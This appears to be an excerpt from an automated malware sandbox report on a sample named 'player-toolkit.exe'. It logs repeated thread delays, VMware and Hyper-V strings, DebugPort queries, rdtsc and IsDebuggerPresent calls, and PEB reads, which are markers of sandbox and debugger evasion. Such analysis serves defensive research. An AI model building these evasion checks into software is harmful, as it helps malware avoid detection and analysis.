Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57807
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57698
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57588
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57479
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57370
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57261
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57151
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57042
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56933
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56823
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56713
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56604
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56495
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56386
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56276
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56167
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56057
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55948
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55839
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55729
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55620
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55511
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55401

Source: explorer.exe, 00000013.00000000.341255319.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000013.00000000.341255319.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000013.00000000.340891539.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000013.00000000.340600690.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000013.00000000.335555394.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000013.00000000.341255319.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000013.00000000.341255319.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000013.00000000.341444076.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000013.00000002.474023233.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000013.00000000.340600690.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000013.00000000.340600690.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000013.00000000.340600690.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\wscript.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Code function: 2_2_00019A80 rdtsc

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Code function: 2_2_02999A00 NtProtectVirtualMemory,LdrInitializeThunk,

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Code function: 29_2_000E6217 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Code function: 29_2_0001C8D0 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary,

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029552A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029552A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029552A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029552A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029552A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02982ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02982AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02955210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02955210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02955210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02955210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02973A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02968A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02994A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02994A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A0B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A0B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A28A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029E4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02959240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02959240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02959240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02959240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0299927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A25BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02982397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298138B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298138B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298138B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02961B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02961B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A0D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02984BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02984BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02984BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A023E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A023E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A023E3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029803E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029803E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029803E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029803E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029803E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029803E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02983B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02983B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A28B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02959080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029990AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029820A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029820A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029820A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029820A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029820A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029820A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029540E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029540E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029540E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029558EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A24015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A24015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296B02A mov eax, dword ptr fs:[00000030h]
